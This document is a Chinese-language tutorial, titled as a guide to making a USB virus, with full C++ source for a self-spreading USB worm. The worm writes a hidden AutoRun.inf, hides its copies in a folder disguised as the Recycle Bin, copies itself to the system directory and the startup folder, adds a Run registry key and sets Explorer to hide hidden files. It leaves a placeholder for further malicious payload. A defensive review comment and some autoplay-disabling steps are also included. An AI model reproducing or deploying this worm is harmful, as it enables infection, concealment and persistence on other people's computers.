u盘病毒制作教程和源码


U盘病毒制作教程

知识点:

---------------------------------------------------------------
新建文件夹的名字是:
回收站.{645FF040-5081-101B-9F08-00AA002F954E}
资源管理器会把带有该 CLSID 后缀的文件夹当作“回收站”外壳对象来显示,双击打开时进入的是回收站视图,因此在资源管理器里看不到其中的文件。这只是显示层面的伪装:文件仍然原样保存在磁盘上,用命令行 dir /a 或不经过外壳命名空间的工具仍然可以列出。
---------------------------------------------------------------
autorun.inf
[AutoRun]
open=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe
shell\open=打开(&o)
shell\open\command=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe
shell\open\Defalut=1
shell\explore=资源管理(&o)
shell\explore\command=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe


---------------------------------------------------------------
控制资源管理器是否显示隐藏文件和文件夹的注册表项(Hidden 的取值:1 为显示,2 为不显示;如果“显示隐藏的文件和文件夹”选项改了之后不生效,应检查下面这几个值是否被改动过):
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
CheckedValue------>1
HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
Hidden------------>2

ShowSuperHidden--->1

---------------------------------------------------------------


关闭u盘自动播放功能:
1.停止 Shell Hardware Detection 服务,并将其启动类型设为“禁用”
2.打开组策略(gpedit.msc)找到“计算机配置”----“管理模板”---“系统”-----“关闭自动播放”,进行设置
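3.修改注册表[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:0000000c
(说明:该值是按驱动器类型划分的位掩码,0x0c 只覆盖可移动磁盘和固定磁盘;要对所有类型的驱动器关闭自动运行,应设为 0xff。HKEY_CURRENT_USER 下的设置只对当前用户生效,要对整机生效需在 HKEY_LOCAL_MACHINE 的同一路径下设置。)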


/*
 * NOTE(review): this listing was flattened during extraction. The original
 * line breaks are gone, so each `//` comment runs into the statements that
 * used to follow it. The text is kept verbatim below; nothing has been
 * repaired, completed or reformatted.
 *
 * Behaviour visible in the code, read for detection and clean-up:
 *  - GetUName() walks drive letters 'a'..'z' and returns the first one for
 *    which GetDriveType() reports DRIVE_REMOVABLE. ScanDisk() repeats that
 *    check every 5000 ms until a letter is found.
 *  - VirusAction() then
 *      * writes AutoRun.inf to the root of that drive and sets
 *        HIDDEN | READONLY | SYSTEM on it;
 *      * copies its own image (path from GetModuleFileName) to
 *        <system directory>\20130927.exe and into a folder on the drive whose
 *        name ends in the shell CLSID {645FF040-5081-101B-9F08-00AA002F954E};
 *      * sets a REG_SZ value named "KeyName" under
 *        HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run holding the
 *        system-directory path, and copies itself to the hard-coded
 *        All Users start-up folder path;
 *      * sets "Hidden" = 2 under
 *        HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced;
 *      * starts the copy on the drive with WinExec(..., SW_HIDE) when its own
 *        path differs from that copy, otherwise sleeps in an endless loop.
 *
 * Every step leaves an artefact a defender can look for: an AutoRun.inf with
 * hidden/system attributes in a removable drive's root, a directory name with
 * a CLSID suffix, a 20130927.exe in the system directory and start-up folder,
 * the "KeyName" Run value, and the changed "Hidden" value.
 *
 * The AutoRun.inf entries only take effect where AutoRun is still enabled for
 * removable drives. Windows 7 and later honour only the label and icon
 * entries for non-optical removable media, and the NoDriveTypeAutoRun policy
 * disables AutoRun on older systems.
 */
// 20130927.cpp : Defines the entry point for the application.//#include "stdafx.h"#include <stdio.h>//全局变量好办事char U_path[]="a:\\回收站.{645FF040-5081-101B-9F08-00AA002F954E}";//默认u盘路径为a//获得正确U盘盘符char GetUName(){char i;char u_path[7]="";for (i='a';i<='z';i++){u_path[0]=i;u_path[1]=':';u_path[2]='\\';u_path[3]='\\';u_path[4]='\0';if (GetDriveType(u_path)==DRIVE_REMOVABLE){return i;}}return NULL;}bool CheckDisk(){if (GetUName()!=NULL){U_path[0]=GetUName();return true;}return false;}//每过5秒扫描一次void ScanDisk(){while (!CheckDisk()){Sleep(5000);}}//病毒行为!void VirusAction(){//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////双击U盘运行程序的AutoRun.infchar f_inf_name[]="a:\\AutoRun.inf";f_inf_name[0]=U_path[0];char f_inf_content[]="[AutoRun]\r\nopen=.\\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\\20130927.exe\r\nshell\\open\\Command=.\\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\\20130927.exe\r\nshell\\explore\\Command=.\\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\\20130927.exe";FILE *pf_inf = fopen(f_inf_name,"wb+");if (pf_inf!=NULL){fwrite(f_inf_content,sizeof(char),sizeof(f_inf_content),pf_inf);fclose(pf_inf);}SetFileAttributes(f_inf_name,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM);////////////////////////////////////////////////////////////////////////////拷贝到系统目录char path_system[MAX_PATH];GetSystemDirectory(path_system,MAX_PATH);strcat(path_system,"\\20130927.exe");char path_thisEXE[MAX_PATH];GetModuleFileName(NULL,path_thisEXE,MAX_PATH);//If this parameter is TRUE and the new file already exists, the function failsCopyFile(path_thisEXE,path_system,TRUE);//拷贝到U盘CreateDirectory(U_path,NULL);strcat(U_path,"\\20130927.exe");CopyFile(path_thisEXE,U_path,TRUE);////////////////////////////////////////////////////////////////////////////开机启动此程序HKEY h_openkey;DWORD 
cbData_1=200;RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_ALL_ACCESS,&h_openkey);RegSetValueEx(h_openkey,"KeyName",0,REG_SZ,(BYTE*)path_system,cbData_1);RegCloseKey(h_openkey);char t_AutoStartPath[MAX_PATH]="C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动";strcat(t_AutoStartPath,"\\20130927.exe");CopyFile(path_thisEXE,t_AutoStartPath,TRUE);////////////////////////////////////////////////////////////////////////////隐藏程序//设置隐藏文件夹不可见DWORD Data=2;RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced",0,KEY_ALL_ACCESS,&h_openkey);RegSetValueEx(h_openkey,"Hidden",0,REG_DWORD,(const BYTE*)(&Data),sizeof(Data));//最后面的那个参数很重要RegCloseKey(h_openkey);////////////////////////////////////////////////////////////////////////////////   此处可写你想做的的“罪恶行为”!//////////////////////////////////////////////////////////////////////////////////执行U盘里那个程序,防止删除if (strcmp(path_thisEXE,U_path)!=0)//只执行一次{WinExec(U_path,SW_HIDE);}else{while(1)//死循环永远不退出程序{Sleep(50*1000);//降低CPU负载}}}int APIENTRY WinMain(HINSTANCE hInstance,                     HINSTANCE hPrevInstance,                     LPSTR     lpCmdLine,                     int       nCmdShow){ // TODO: Place code here.//主程序包括两部分:磁盘扫描和病毒感染//磁盘扫描ScanDisk();//扫描不到U盘下个函数就不会执行//病毒感染VirusAction();return 0;}

Autorun.inf文件内容:

autorun病毒:
Autorun.inf

[AutoRun]
open=notepad.exe
shellexecute=notepad.exe
shell\Auto\command=notepad.exe




[AutoRun]
open=notepad.exe
shell\open=打开(&o)
shell\open\command=notepad.exe
shell\open\Defalut=1
shell\explore=资源管理(&o)
shell\explore\command=notepad.exe








[AutoRun]
open=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe
shell\open=打开(&o)
shell\open\command=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe
shell\open\Defalut=1
shell\explore=资源管理(&o)
shell\explore\command=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe








open=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe
shell\open\Command=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe
shell\explore\Command=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe




























